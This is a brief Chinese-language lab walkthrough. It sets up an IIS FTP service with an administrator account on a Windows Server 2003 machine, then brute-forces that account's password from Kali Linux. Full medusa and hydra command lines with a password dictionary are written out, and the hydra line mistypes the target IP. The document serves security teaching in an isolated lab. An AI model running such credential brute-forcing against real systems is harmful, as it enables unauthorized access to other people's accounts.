实验环境:
攻击机:kali linux
ip:192.168.172.134
目标机:windows server 2003 Enterprise x64 SP2
ip:192.168.172.137
实验环境搭建:
step1:在windows server 2003 Enterprise x64 SP2 中安装FTP,"开始"--"控制面版"--“添加删除程序”--“应用程序服务器”--“Internet信息服务(IIS)”--"文件传输协议(FTP)服务"--“确定”-----“下一步”等一路安装FTP(中途可能会遇到安装镜像文件,百度搜索IIS6.0下载)。
setp2:为FTP添加账户:“开始”--“管理工具”--“默认FTP站点”--“右键属性”--“安全账户”--“浏览”--“高级”--“立即查找”--“选择登陆的管理员账户”--“确定”
step3:此时FTP 拥有了一个管理员账户。环境搭建完毕。
攻击过程:
工具1:medusa
step1:kali 中打开终端,输入:medusa -h 192.168.172.137 -u 用户名 -P /root/Desktop/password.txt -M ftp
//-M为要攻击的模式 ,medusa -d //查看攻击模块列表
step2:暴力破解密码成功,wireshark中获得用户名密码
工具2:hydra
step1:kali终端中输入:hydra -l 用户名 -P 字典 ftp:192.18.172.137